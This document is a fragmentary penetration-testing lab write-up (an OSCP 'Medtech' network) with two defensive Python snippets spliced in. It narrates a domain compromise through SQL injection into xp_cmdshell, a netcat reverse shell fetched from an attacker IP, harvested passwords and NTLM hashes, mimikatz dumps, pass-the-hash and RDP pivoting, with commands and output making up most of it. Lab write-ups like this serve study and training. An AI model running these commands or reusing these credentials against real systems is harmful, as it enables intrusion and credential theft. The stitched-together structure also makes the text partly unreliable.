OSCP-Medtech

Sqlmap GetShell

Download nc and get a reverse shell

admin';EXEC master..xp_cmdshell 'powershell wget http://192.168.45.224:88/shell/nc.exe -outfile c:\windows\temp\nc.exe'--

powershell wget http://1.1.1.1/nc.exe -outfile c:\windows\temp\nc.exe
admin';EXEC master..xp_cmdshell 'c:\windows\temp\nc.exe 192.168.45.224 1337 -e cmd'---

c:\windows\temp\nc.exe 1.1.1.1 1337 -e cmd

Information gathering

Writing a one-liner webshell fails: insufficient permissions

MSSQL password

c:\inetpub\wwwroot>type web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
    <system.web>
<!--            <customErrors mode="On">
                <error statusCode="500" redirect="error.aspx"/>
                        <error statusCode="404" redirect="error.aspx"/>
                </customErrors> -->
    <customErrors mode="RemoteOnly" />
                <compilation debug="true" targetFramework="4.0">
                        <assemblies>
                                <add assembly="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />
                                <add assembly="System.DirectoryServices.AccountManagement, Version=3.5.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089" />
                                <add assembly="System.DirectoryServices.Protocols, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />
                        </assemblies>
                </compilation>
        </system.web>
        <system.webServer>
        <defaultDocument>
            <files>
                <clear />
                <add value="index.html" />
                <add value="index.htm" />
                <add value="default.aspx" />
            </files>
        </defaultDocument>
    </system.webServer>
        <connectionStrings>
                <add name="myConnectionString" connectionString="server=localhost\SQLEXPRESS;database=webapp;uid=sa;password=WhileChirpTuesday218;Trusted_Connection=False;MultipleActiveResultSets=true; Integrated Security=False; Max Pool Size=500;" />
        </connectionStrings>
</configuration>
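As an added example, not part of the original writeup: a small Python audit of a web.config like the one above, flagging what a defender would fix (the web app logging in as `sa`, a plaintext password in the file, `debug="true"`). The config text is constructed and the password is a placeholder.

```python
import xml.etree.ElementTree as ET

# Constructed web.config modelled on the one above; the password is a placeholder.
SAMPLE_WEB_CONFIG = """<configuration>
  <system.web>
    <customErrors mode="RemoteOnly" />
    <compilation debug="true" targetFramework="4.0" />
  </system.web>
  <connectionStrings>
    <add name="myConnectionString"
         connectionString="server=localhost\\SQLEXPRESS;database=webapp;uid=sa;password=PLACEHOLDER;Trusted_Connection=False;Integrated Security=False;" />
  </connectionStrings>
</configuration>"""


def parse_connection_string(conn):
    """Split 'key=value;key=value' into a dict with lower-cased keys."""
    pairs = {}
    for part in conn.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            pairs[key.strip().lower()] = value.strip()
    return pairs


def audit_web_config(xml_text):
    """Return a list of (severity, message) findings for a web.config."""
    findings = []
    root = ET.fromstring(xml_text)
    comp = root.find("./system.web/compilation")
    if comp is not None and comp.get("debug", "").lower() == "true":
        findings.append(("medium", "compilation debug=true: detailed errors and stack traces reach clients"))
    for add in root.findall("./connectionStrings/add"):
        name = add.get("name", "?")
        cs = parse_connection_string(add.get("connectionString", ""))
        user = cs.get("uid") or cs.get("user id") or cs.get("user")
        pwd = cs.get("password") or cs.get("pwd")
        if user and user.lower() == "sa":
            # sysadmin login lets any SQL injection reach xp_cmdshell and the OS
            findings.append(("high", f"{name}: web app connects as 'sa'; use a least-privilege SQL login"))
        if pwd:
            # readable by anyone who can read the file; aspnet_regiis -pe can encrypt the section
            findings.append(("high", f"{name}: plaintext password in web.config; encrypt connectionStrings (aspnet_regiis -pe)"))
        if user and cs.get("integrated security", "").lower() == "false":
            findings.append(("low", f"{name}: SQL authentication in use instead of integrated security"))
    return findings
```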

Usernames

IP information

System information

Locate the domain controller

User

Administrator
Guest
joe
krbtgt
leon
mario
offsec
peach
wario
yoshi

Pass

Flowers1
lab
point145dream
WhileChirpTuesday218

BadPotato privilege escalation, WEB01 (.121) owned

FILES02 (.11) owned

Impacket


crackmapexec


Information gathering: found NTLM hashes

type fileMonitorBackup.log | findstr NTLM
   88934 Oct 04 11:21  Backup      daisy                        6872 Backup Completed. NTLM: abf36048c1cf88f5603381c5128feb8e
   88605 Oct 04 11:21  Backup      toad                         6872 Backup Completed. NTLM: 5be63a865b65349851c1f11a067a3068
   88137 Oct 04 11:21  Backup      wario                        6872 Backup Completed. NTLM: fdf36048c1cf88f5630381c5e38feb8e          Mushroom!
   87139 Oct 04 11:21  Backup      goomba                       6872 Backup Completed. NTLM: 8e9e1516818ce4e54247e71e71b5f436
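Added example, not from the writeup: a parser for lines in the fileMonitorBackup.log layout shown above that reports which entries leak an NTLM hash and produces a redacted copy, the kind of check a defender runs over backup or monitoring logs before they are shared. The log lines and hashes below are constructed.

```python
import re

# Constructed log lines in the same column layout as fileMonitorBackup.log; hashes are made up.
SAMPLE_LOG = """\
   88934 Oct 04 11:21  Backup      daisy                        6872 Backup Completed. NTLM: 0123456789abcdef0123456789abcdef
   88605 Oct 04 11:21  Backup      toad                         6872 Backup Completed.
   88137 Oct 04 11:21  Backup      wario                        6872 Backup Completed. NTLM: fedcba9876543210fedcba9876543210
   87139 Oct 04 11:21  Backup      goomba                       6872 Backup Started.
"""

# seq, timestamp, source, account, pid, free-text message
LINE_RE = re.compile(
    r"^\s*(?P<seq>\d+)\s+(?P<date>\w{3} \d{2} \d{2}:\d{2})\s+(?P<src>\S+)\s+"
    r"(?P<user>\S+)\s+(?P<pid>\d+)\s+(?P<msg>.*)$"
)
# an NT hash is 32 hex characters; the label is how this log writes it
NTLM_RE = re.compile(r"\bNTLM:\s*([0-9a-fA-F]{32})\b")


def find_leaked_hashes(log_text):
    """Return one dict per log entry whose message carries an NTLM hash."""
    leaks = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected layout
        h = NTLM_RE.search(m["msg"])
        if h:
            leaks.append({"seq": int(m["seq"]), "user": m["user"], "hash": h.group(1).lower()})
    return leaks


def redact(log_text):
    """Return a copy of the log safe to share: hash values replaced, layout kept."""
    return NTLM_RE.sub("NTLM: [REDACTED]", log_text)
```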

CLIENT02 (.83) owned

proxychains4  crackmapexec winrm  172.16.192.1/24 -u wario -H fdf36048c1cf88f5630381c5e38feb8e -x "whoami"

Privilege escalation



------------------- Hashdump passwords -----------------


------------------- Pypykatz passwords -----------------

[+] Shahash found !!!
Shahash: 8a2930d3a4a9620468d85825d4f35fac3502ce4d
Nthash: ca89c858303e929cb7b6b65c3453dae8
Login: CLIENT02$

VPN (.122) owned

SSH brute force

offsec
password

Privilege escalation

Following the hint, list all commands, check the command history and run it; privilege escalation succeeded

Got proof.txt

Information gathering

Suspicious process

# cat /root/scripts/.startup.py
import os
import time

if __name__ == '__main__':
    os.chdir('/etc/openvpn/server/')
    os.system('openvpn /etc/openvpn/server/server_mini.conf')



# cat /etc/openvpn/server/server_mini.conf
dev tun
proto tcp-server
secret static.key

# cat /etc/shadow
root:$y$j9T$2pGfmLZ2kv0OMN7xs1QG21$6NibMN8YIZ794SpXXu9g3DMMJIZr95EFRVcs7xUs568:19268:0:99999:7:::
offsec:$y$j9T$cz8KelZ70XBw8aW0yGHDM1$dGUNrLYSuRA9Nzj4KGBF7dzCvQOZkO5lY.2fM2yjan3:19424:0:99999:7:::
mario:$y$j9T$WlF.5NfkOQ2xN4K9OPM2e1$X/wrPHU0zaz.dGUjFQGLj5nbrTfNpy0Hm6Xev04aUw8:19268:0:99999:7:::

.14 owned

Found an SSH private key

Connect directly over SSH

ssh -i id_rsa [email protected]

CLIENT01 (.82) owned

Logged in successfully via RDP

proxychains4 xfreerdp /v:172.16.218.82:3389 /u:yoshi /p:Mushroom!

Administrator privileges directly

Got proof.txt

Mimikatz didn't capture anything useful; searched with a homemade file search tool and found the target file

C:\Users\yoshi\Downloads>type C:\users\Administrator.MEDTECH\Searches\hole.txt
leon:rabbit!:)

DEV04 (.12) owned

proxychains4 xfreerdp /v:172.16.218.12:3389 /u:yoshi /p:Mushroom!

Dumped passwords with Mimikatz and found leon's credentials

Authentication Id : 0 ; 363938 (00000000:00058da2)
Session           : Interactive from 1
User Name         : leon
Domain            : MEDTECH
Logon Server      : DC01
Logon Time        : 6/10/2023 9:30:34 AM
SID               : S-1-5-21-976142013-3766213998-138799841-1105
        msv :
         [00000003] Primary
         * Username : leon
         * Domain   : MEDTECH
         * NTLM     : 2e208ad146efda5bc44869025e06544a
         * SHA1     : 8d1c9e13d2d2c20dbee8b4eacb20b73f06573c96
         * DPAPI    : a7bad14f64c3cf0d7ae2b5f6392a0b6d
        tspkg :
        wdigest :
         * Username : leon
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : leon
         * Domain   : MEDTECH.COM
         * Password : rabbit:)

Log in to the domain controller

Found new information

.120 owned

Collect accounts and passwords for SSH brute force, or work from the gathered information

powershell wget http://192.168.45.190:88/getpassword/mimi_64/mimikatz.exe -outfile c:\m.exe

m.exe "privilege::debug" "sekurlsa::logonpasswords" exit > hash.txt

powershell wget http://192.168.45.190:88/CheckUserFileAll.exe -outfile c:\CheckUserFileAll.exe

powershell wget http://192.168.45.190:88/privilege/windows/winPEASx64.exe -outfile c:\winPEASx64.exe

10

Domain controller hash dump

11

12

13

14

82

83

120

121

122